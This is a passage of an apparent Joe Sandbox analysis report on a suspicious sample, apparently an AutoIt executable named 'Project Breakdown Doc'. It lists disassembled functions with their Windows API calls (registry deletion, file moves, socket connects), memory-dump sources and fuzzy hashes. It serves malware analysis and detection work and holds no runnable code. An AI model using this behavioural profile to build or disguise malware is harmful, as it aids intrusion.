                                                  Function 00CA38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00CA48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CA38D3,?), ref: 00CA48C7
                                                    • Part of subcall function 00CA48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CA38D3,?), ref: 00CA48E0
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00CA38F3
                                                  • _wcscmp.LIBCMT ref: 00CA390F
                                                  • MoveFileW.KERNEL32(?,?), ref: 00CA3927
                                                  • _wcscat.LIBCMT ref: 00CA396F
                                                  • SHFileOperationW.SHELL32(?), ref: 00CA39DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                  • String ID: \*.*
                                                  • API String ID: 1377345388-1173974218
                                                  • Opcode ID: 6c32e98e6dfd9242299d16778dd8d933e44cea83f380ee33f0cab77add8aadac
                                                  • Instruction ID: 76d466070f98c8348b4ccabd1532b612cab283f591495d37ac797f1a62aa6da5
                                                  • Opcode Fuzzy Hash: 6c32e98e6dfd9242299d16778dd8d933e44cea83f380ee33f0cab77add8aadac
                                                  • Instruction Fuzzy Hash: 0641B1B15083859EC755EF64C491AEFB7E8AF89344F04092EF499C3191EB74D748C752
                                                  Function 00CC7500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CC7519
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CC75C0
                                                  • IsMenu.USER32(?), ref: 00CC75D8
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CC7620
                                                  • DrawMenuBar.USER32 ref: 00CC7633
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                  • String ID: 0
                                                  • API String ID: 3866635326-4108050209
                                                  • Opcode ID: 34f29e23eff1deef06a0e6a64f9d30d4cb0472f32882e14a874c65bb3f91522d
                                                  • Instruction ID: 19d8add34bbb6e20d54311a84c57982cb6f8b6a609a9e66d23f0c0609e758097
                                                  • Opcode Fuzzy Hash: 34f29e23eff1deef06a0e6a64f9d30d4cb0472f32882e14a874c65bb3f91522d
                                                  • Instruction Fuzzy Hash: E84115B5A04609AFDB20DF54D885F9ABBF9FB08310F048229F92597690D730AE51CFA0
                                                  Function 00CC122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00CC125C
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CC1286
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00CC133D
                                                    • Part of subcall function 00CC122D: RegCloseKey.ADVAPI32(?), ref: 00CC12A3
                                                    • Part of subcall function 00CC122D: FreeLibrary.KERNEL32(?), ref: 00CC12F5
                                                    • Part of subcall function 00CC122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00CC1318
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00CC12E0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                  • String ID:
                                                  • API String ID: 395352322-0
                                                  • Opcode ID: 42f419dd7fcbcb402fd61e6a32ce499da7e3986fc63a410dac7c85417d5e261f
                                                  • Instruction ID: 6fd4b826ca938c4c4b3cda7b8e8df09cba2f7e196411f706b4033f1790ed7f5c
                                                  • Opcode Fuzzy Hash: 42f419dd7fcbcb402fd61e6a32ce499da7e3986fc63a410dac7c85417d5e261f
                                                  • Instruction Fuzzy Hash: 76314BB1901109BFDB14DB91DC89FFEBBBCEF09304F04416DE912E2152EA749F469AA0
                                                  Function 00CC653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CC655B
                                                  • GetWindowLongW.USER32(017A55B0,000000F0), ref: 00CC658E
                                                  • GetWindowLongW.USER32(017A55B0,000000F0), ref: 00CC65C3
                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00CC65F5
                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00CC661F
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00CC6630
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CC664A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$MessageSend
                                                  • String ID:
                                                  • API String ID: 2178440468-0
                                                  • Opcode ID: cb159b60e0276752d6cdf087bceb7d5482976276c6484e2048b40cb51254699e
                                                  • Instruction ID: d3adf0c3e275df0a8c78d58f1122956d56979fc2ee96382e70ed332a7233237b
                                                  • Opcode Fuzzy Hash: cb159b60e0276752d6cdf087bceb7d5482976276c6484e2048b40cb51254699e
                                                  • Instruction Fuzzy Hash: 24310230604211AFDB21CF18DE84F693BE1FB4A714F2841A8F525CB2B6CB71E991DB51
                                                  Function 00CB6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00CB80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00CB80CB
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00CB64D9
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00CB64E8
                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00CB6521
                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00CB652A
                                                  • WSAGetLastError.WSOCK32 ref: 00CB6534
                                                  • closesocket.WSOCK32(00000000), ref: 00CB655D
                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00CB6576
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 910771015-0
                                                  • Opcode ID: 8f7ea5432215ca289655654ffffddfeda72659f71ca60de23f5ef3b68cfaa95c
                                                  • Instruction ID: 39d70b9254247776cd5c4ff7809aac38ec90ae6576d68495bf8a48f90d211934
                                                  • Opcode Fuzzy Hash: 8f7ea5432215ca289655654ffffddfeda72659f71ca60de23f5ef3b68cfaa95c
                                                  • Instruction Fuzzy Hash: ED31B131600218AFDB10AF24CC85FFE7BADEB45714F008069F91997291CB74AD09DBA1
                                                  Function 00C9E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C9E0FA
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C9E120
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00C9E123
                                                  • SysAllocString.OLEAUT32 ref: 00C9E144
                                                  • SysFreeString.OLEAUT32 ref: 00C9E14D
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00C9E167
                                                  • SysAllocString.OLEAUT32(?), ref: 00C9E175
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: 9c38f87d5460c3a8a7c964ae16e35594fd5d0a5010d0be100e9c6caa5e6202fa
                                                  • Instruction ID: 16e9c2a7186233f3b9df867c3926d3b200c58eca516f969a9bb72172f4c5a9d5
                                                  • Opcode Fuzzy Hash: 9c38f87d5460c3a8a7c964ae16e35594fd5d0a5010d0be100e9c6caa5e6202fa
                                                  • Instruction Fuzzy Hash: D121A131600208AFDF10DFA9DC88EAF77EDEB19760B108129F915CB2A1DA71DD41CB60
                                                  Function 00C9FB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                  • API String ID: 1038674560-2734436370
                                                  • Opcode ID: 8c63b5e60a8d64ae6365b32bdf23311fa623bd7da1dbd48124f393b3b2f6ab8f
                                                  • Instruction ID: 450a21d0bfa2c62c31d0af385c1e73236c4bd5b5e65ee38eb2650c3621e4dddd
                                                  • Opcode Fuzzy Hash: 8c63b5e60a8d64ae6365b32bdf23311fa623bd7da1dbd48124f393b3b2f6ab8f
                                                  • Instruction Fuzzy Hash: 2C213A3220425167DB30AA24DC16EA773D8EF51354F14803EF995C7141E7919A83E295
                                                  Function 00CC783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C41D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C41D73
                                                    • Part of subcall function 00C41D35: GetStockObject.GDI32(00000011), ref: 00C41D87
                                                    • Part of subcall function 00C41D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C41D91
                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CC78A1
                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CC78AE
                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CC78B9
                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CC78C8
                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CC78D4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                  • String ID: Msctls_Progress32
                                                  • API String ID: 1025951953-3636473452
                                                  • Opcode ID: cff936a5f54d87c074ef58a251e7dd1435ef0c53ee3c6d7b8b8a8cf5255d0048
                                                  • Instruction ID: 88fe1fd2dd4f2350a952813fb7c1d98c4e95b9784e6838ba9cbd4e9f39e9969e
                                                  • Opcode Fuzzy Hash: cff936a5f54d87c074ef58a251e7dd1435ef0c53ee3c6d7b8b8a8cf5255d0048
                                                  • Instruction Fuzzy Hash: 59118EB2510219BEEF159F60CC85EEB7F6DEF08758F014219FB04A6090C772AC21DBA0
                                                  Function 00C641C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00C64292,?), ref: 00C641E3
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00C641EA
                                                  • EncodePointer.KERNEL32(00000000), ref: 00C641F6
                                                  • DecodePointer.KERNEL32(00000001,00C64292,?), ref: 00C64213
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                  • String ID: RoInitialize$combase.dll
                                                  • API String ID: 3489934621-340411864
                                                  • Opcode ID: 313c3e22705952b69f6aceb0c3ad12152aaa81071ad00d843c600fc6af011c3e
                                                  • Instruction ID: b00d7ab51bdf1666019b77edf3241d609d14eaacae32d108b112dcb3b467e7dc
                                                  • Opcode Fuzzy Hash: 313c3e22705952b69f6aceb0c3ad12152aaa81071ad00d843c600fc6af011c3e
                                                  • Instruction Fuzzy Hash: F9E01AF0E90340AEEB206BB0EC49F0C3AA6B761B02F108438F625D52B0DBB54096CF11
                                                  Function 00C6429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C641B8), ref: 00C642B8
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00C642BF
                                                  • EncodePointer.KERNEL32(00000000), ref: 00C642CA
                                                  • DecodePointer.KERNEL32(00C641B8), ref: 00C642E5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                  • String ID: RoUninitialize$combase.dll
                                                  • API String ID: 3489934621-2819208100
                                                  • Opcode ID: 6cbfc00febc04bc59be696b632ead41addc5b5988413695f4dc7afaee481a7f8
                                                  • Instruction ID: 86d88fabfa62023ca96d96f95a37e0713fe311a09469f011314cd5124d22c914
                                                  • Opcode Fuzzy Hash: 6cbfc00febc04bc59be696b632ead41addc5b5988413695f4dc7afaee481a7f8
                                                  • Instruction Fuzzy Hash: 4BE0ECBC581300EFEB209F61EC0DF0A3AA6B724742F244039F215E12B0CBB48586CB25
                                                  Function 00CA675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memmove$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 3253778849-0
                                                  • Opcode ID: cb1dd912e883e8d9c29446e36cc817b48adc01cf96968c0a1b7864e8d4a650fe
                                                  • Instruction ID: 928343d2baf2ffdaa87a5a1555e5a056b91e2c518684bc4e8f752c7d8bc53661
                                                  • Opcode Fuzzy Hash: cb1dd912e883e8d9c29446e36cc817b48adc01cf96968c0a1b7864e8d4a650fe
                                                  • Instruction Fuzzy Hash: E961AB3050465A9BCF21EF60CC82EFF37A8FF45308F084519F85A6B292DB34A941EB90
                                                  Function 00CC046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                    • Part of subcall function 00CC10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC0038,?,?), ref: 00CC10BC
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC0548
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CC0588
                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00CC05AB
                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CC05D4
                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CC0617
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00CC0624
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                  • String ID:
                                                  • API String ID: 4046560759-0
                                                  • Opcode ID: a1500efb94ce493489311531fedd4a29272db41b4ad1c16cdafb97266db11b5e
                                                  • Instruction ID: 4162e6e6232ce53ce4e4ebc23ad5f893ae6965d3bcc0806b5aa74070c8f5b000
                                                  • Opcode Fuzzy Hash: a1500efb94ce493489311531fedd4a29272db41b4ad1c16cdafb97266db11b5e
                                                  • Instruction Fuzzy Hash: B4513831108200AFCB14EF64C885E6FBBE9FF85714F14491DF995972A2DB31EA05EB52
                                                  Function 00CC5A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetMenu.USER32(?), ref: 00CC5A82
                                                  • GetMenuItemCount.USER32(00000000), ref: 00CC5AB9
                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CC5AE1
                                                  • GetMenuItemID.USER32(?,?), ref: 00CC5B50
                                                  • GetSubMenu.USER32(?,?), ref: 00CC5B5E
                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00CC5BAF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountMessagePostString
                                                  • String ID:
                                                  • API String ID: 650687236-0
                                                  • Opcode ID: c82156f2775541129bad8ec1aac252fcf82ef305e31e1513fef78ff1ec1355ef
                                                  • Instruction ID: 7c756cb4e8d8a22ba761f5e8bf1ef9090d6127cf6d2a0f84ef1808d2f5cf82da
                                                  • Opcode Fuzzy Hash: c82156f2775541129bad8ec1aac252fcf82ef305e31e1513fef78ff1ec1355ef
                                                  • Instruction Fuzzy Hash: 98517C31A00615AFCF11EFA5C895EAEBBB5EF48310F144469F816B7351CB70BE81AB90
                                                  Function 00C9F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00C9F3F7
                                                  • VariantClear.OLEAUT32(00000013), ref: 00C9F469
                                                  • VariantClear.OLEAUT32(00000000), ref: 00C9F4C4
                                                  • _memmove.LIBCMT ref: 00C9F4EE
                                                  • VariantClear.OLEAUT32(?), ref: 00C9F53B
                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C9F569
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                  • String ID:
                                                  • API String ID: 1101466143-0
                                                  • Opcode ID: 8863d096aaf944d3bf06a999d8cad09ad5c3cafec054436fc3f6afe1731ac7a5
                                                  • Instruction ID: 459ebf8185127905df4c512969173b92c218feab7a94bc59154a422a90478c9c
                                                  • Opcode Fuzzy Hash: 8863d096aaf944d3bf06a999d8cad09ad5c3cafec054436fc3f6afe1731ac7a5
                                                  • Instruction Fuzzy Hash: ED515AB5A00209EFCB14CF58D884EAAB7B9FF48314B15816EE959DB310D730E952CBA0
                                                  Function 00CA26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CA2747
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA2792
                                                  • IsMenu.USER32(00000000), ref: 00CA27B2
                                                  • CreatePopupMenu.USER32 ref: 00CA27E6
                                                  • GetMenuItemCount.USER32(000000FF), ref: 00CA2844
                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00CA2875
                                                  Memory Dump Source
